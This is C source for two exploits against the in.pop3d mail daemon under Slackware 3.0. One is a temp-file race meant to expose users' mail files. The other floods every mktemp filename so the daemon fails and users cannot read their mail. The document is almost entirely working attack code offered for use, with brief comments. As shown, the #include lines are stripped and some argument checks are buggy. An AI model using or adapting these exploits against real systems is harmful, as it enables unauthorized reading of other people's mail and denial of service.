/* This program creates temporary files used by in.pop3d (/usr/sbin/in.pop3d under Slackware 3.0), which can then be read by the program. This race condition is NOT always successful, it may take extreme conditions to ensure a high probability of success. pop3d-exploit.c: Dave M. (davem@cmu.edu) */ #include #include #include #include main(int argc, char **argv) { int race; int i; char fname[80], tmpf[80]; /* hold filename */ umask(0); if(argc<1) { printf("pop3 racer\nSyntax: %s process-id\n",argv[0]); return -1; } /* create tmp file to race creating */ strcpy(tmpf,"/tmp/pop3"); for(i=strlen(argv[1]);i<6;i++) strcat(tmpf,"0"); strcat(tmpf,argv[1]); tmpf[9] = 'a'; race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH); while(1) { rename(tmpf,"/tmp/pop.exploit"); if(rename("/tmp/pop.exploit",tmpf) < 0) { printf("race lost - file created.\n"); /* catch 1/2 the losses */ break; } } } /* The other exploit. deny-mktemp.c: */ /* This programs opens the complete set of temporary files tested with mktemp() for a given template (with 6 X's), usually resulting in the program terminating upon failure to find an open file. In pop3d, this prevents a pop client from reading their mail. Dave M. (davem@cmu.edu) */ #include #include #include #include #include /* template found in program's header file, minus X's */ #define TEMPLATE "/tmp/pop3" main(int argc, char **argv) { long int i,j; char fname[20]; if(argc<2) { printf("Syntax: %s process-id\n"); return -1; } j = strlen(TEMPLATE); strcpy(fname,TEMPLATE); for(i=strlen(argv[1]);i<6;i++) strcat(fname,"0"); strcat(fname,argv[1]); for(i=0;i<26;i++) { fname[j] = 'a' + i; creat(fname,O_WRONLY | O_CREAT); } for(i=0;i<26;i++) { fname[j] = 'A' + i; creat(fname,O_WRONLY | O_CREAT); } for(i=0;i<9;i++) { fname[j] = '0' + i; creat(fname,O_WRONLY | O_CREAT); } }